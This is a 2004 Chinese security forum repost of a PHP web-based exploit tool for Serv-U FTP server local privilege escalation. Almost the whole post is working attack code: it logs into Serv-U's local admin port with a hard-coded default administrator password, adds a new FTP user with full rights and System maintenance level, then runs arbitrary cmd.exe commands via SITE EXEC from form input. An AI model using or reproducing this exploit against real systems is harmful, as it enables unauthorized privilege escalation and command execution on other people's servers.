[转载]我非我的PHP的SERV-U利用工具

exploit

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 1449
精华: 90
积分: 8884
阅读权限: 100
性别: 男
来自: 河北
在线时间: 153 小时
注册时间: 2013-12-25
最后登录: 2007-4-6

优秀管理奖资料收集奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-12-13 07:23 只看该作者

[转载]我非我的PHP的SERV-U利用工具

来源:冰点论坛

作者:我非我

<html>
<head>
<title>Serv-U本地提升权限Exp10it By 我非我</title>
<meta content="text/html; charset=gb2312" http-equiv="Content-Type">
<STYLE TYPE="text/css">
b {font-family : Verdana, sans-serif;font-size : 14px;}
body,td,p,pre {
font-family : Verdana, sans-serif;font-size : 12px;
}
input {
　　　　　　　　　font-family: "Verdana";
　　　　　　　　　font-size: "11px";
　　　　　　　　　BACKGROUND-COLOR: "#FFFFFF";
　　　　　　　　　height: "18px";
　　　　　　　　　border: "1px solid #666666";
　　　　　　}
</STYLE>
</head>
<body bgcolor="#EEEEEE" text="#000000" link="#006699" vlink="#5493B4">

<form action="<?=$_SERVER['PHP_SELF']?>" method="get">
<center><b>Serv-U本地提升权限Exp10it By 我非我</b>
<center><b>提升权限部分</b>
<hr>
<table width="760" border="0" cellpadding="0">
<tr><td width="150">主机Ftp端口：</td>  <td width="660"><input name="ftpport" type="text" class="INPUT" value="<?=$_GET['ftpport']?>"></td></tr>
<tr><td width="150">添加的用户名：</td>  <td width="660"><input name="user" type="text" class="INPUT" value="<?=$_GET['user']?>"></td></tr>
<tr><td width="150">添加的用户名密码：</td><td width="660"><input name="password" type="password" class="INPUT" value="<?=$_GET['password']?>"></td></tr>
<tr><td width="150">用户主目录(别忘了写"\")：</td>  <td width="660"><input name="homedir" type="text" class="INPUT" value="<?=$_GET['homedir']?>"></td></tr>
<tr><td width="660"><input name="action" type="hidden" value="up"></td></tr>
<tr><td width="150"><input type="submit" class="INPUT" value="提升"></td></tr>
</form></tr>
</table></center><hr>
<textarea cols="80" rows="15" readonly>命令回显:
<?if ($_GET['action']=="up"){
  up($_GET['ftpport'],$_GET['user'],$_GET['password'],$_GET['homedir']);
  }
  ?>
</textarea><hr>

<form action="<?=$_SERVER['PHP_SELF']?>" method="get">
<center><b>Serv-U本地提升权限Exp10it By 我非我</b>
<center><b>执行命令部分</b>
<hr>
<table width="760" border="0" cellpadding="0">
<tr><td width="100">主机Ftp端口：</td>  <td width="660"><input name="ftpport" type="text" class="INPUT" value="<?=$_GET['ftpport']?>"></td></tr>
<tr><td width="100">用户名：</td>  <td width="660"><input name="user" type="text" class="INPUT" value="<?=$_GET['user']?>"></td></tr>
<tr><td width="100">用户名密码：</td><td width="660"><input name="password" type="password" class="INPUT" value="<?=$_GET['password']?>"></td></tr>
<tr><td width="100">执行的命令：</td>  <td width="660"><input name="cmd" type="text" class="INPUT" value="<?=$_GET['cmd']?>"></td></tr>
<tr><td width="660"><input name="action" type="hidden" value="execute"></td></tr>
<tr><td width="100"><input type="submit" class="INPUT" value="执行"></td></tr>
</form></tr></table></center><hr>
<textarea cols="80" rows="15" readonly>命令回显:
<?if ($_GET['action']=="execute"){
  ftpcmd($_GET['ftpport'],$_GET['user'],$_GET['password'],$_GET['cmd']);
  }
?></textarea><hr>
<?php
function up($ftpport,$user,$password,$homedir){
$fp = fsockopen ("127.0.0.1", 43958, $errno, $errstr, 30);
if (!$fp) {
  echo "$errstr ($errno)<br>\n";
} else {
  fputs ($fp, "USER LocalAdministrator\r\n");
  sleep (1);
  fputs ($fp, "PASS #l@\$ak#.lk;0@P\r\n");
  sleep (1);
  fputs ($fp, "SITE MAINTENANCE\r\n");
  sleep (1);
  fputs ($fp, "-SETUSERSETUP\r\n");
  fputs ($fp, "-IP=0.0.0.0\r\n");
  fputs ($fp, "-PortNo=".$ftpport."\r\n");
  fputs ($fp, "-User=".$user."\r\n");
  fputs ($fp, "-Password=".$password."\r\n");
  fputs ($fp, "-HomeDir=".$homedir."\r\n");
  fputs ($fp, "-LoginMesFile=\r\n");
  fputs ($fp, "-Disable=0\r\n");
  fputs ($fp, "-RelPaths=0\r\n");
  fputs ($fp, "-NeedSecure=0\r\n");
  fputs ($fp, "-HideHidden=0\r\n");
  fputs ($fp, "-AlwaysAllowLogin=0\r\n");
  fputs ($fp, "-ChangePassword=1\r\n");
  fputs ($fp, "-QuotaEnable=0\r\n");
  fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n");
  fputs ($fp, "-SpeedLimitUp=-1\r\n");
  fputs ($fp, "-SpeedLimitDown=-1\r\n");
  fputs ($fp, "-MaxNrUsers=-1\r\n");
  fputs ($fp, "-IdleTimeOut=600\r\n");
  fputs ($fp, "-SessionTimeOut=-1\r\n");
  fputs ($fp, "-Expire=0\r\n");
  fputs ($fp, "-RatioUp=1\r\n");
  fputs ($fp, "-RatioDown=1\r\n");
  fputs ($fp, "-RatiosCredit=0\r\n");
  fputs ($fp, "-QuotaCurrent=0\r\n");
  fputs ($fp, "-QuotaMaximum=0\r\n");
  fputs ($fp, "-Maintenance=System\r\n");
  fputs ($fp, "-PasswordType=Regular\r\n");
  fputs ($fp, "-Ratios=None\r\n");
  fputs ($fp, " Access=".$homedir."│RWAMELCDP\r\n");
  sleep (1);
  fputs ($fp, "-GETUSERSETUP\r\n");
  fputs ($fp, "-IP=0.0.0.0\r\n");
  fputs ($fp, "-PortNo=".$ftpport."\r\n");
  fputs ($fp, " User=".$user."\r\n");
  sleep (1);
  fputs ($fp, "QUIT\r\n");
  sleep (1);
  while (!feof($fp)) {
   echo fgets ($fp,128);
  }
  fclose ($fp);
}
}

function ftpcmd($ftpport,$user,$password,$cmd){

$conn_id = fsockopen ("127.0.0.1", $ftpport, $errno, $errstr, 30);

if (!$conn_id) {
  echo "$errstr ($errno)<br>\n";
} else {
  fputs ($conn_id, "USER ".$user."\r\n");
  sleep (1);
  fputs ($conn_id, "PASS ".$password."\r\n");
  sleep (1);
  fputs ($conn_id, "SITE EXEC c:\\windows\\system32\\cmd.exe /c ".$cmd."\r\n");
  fputs ($conn_id, "QUIT\r\n");
  sleep (1);
  while (!feof($conn_id)) {
   echo fgets ($conn_id,128);
  }
  fclose($conn_id);
}
}
?>

益友网吧联盟 http://www.96-7.com

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 开源代码收集{ Software Source Code } » [转载]我非我的PHP的SERV-U利用工具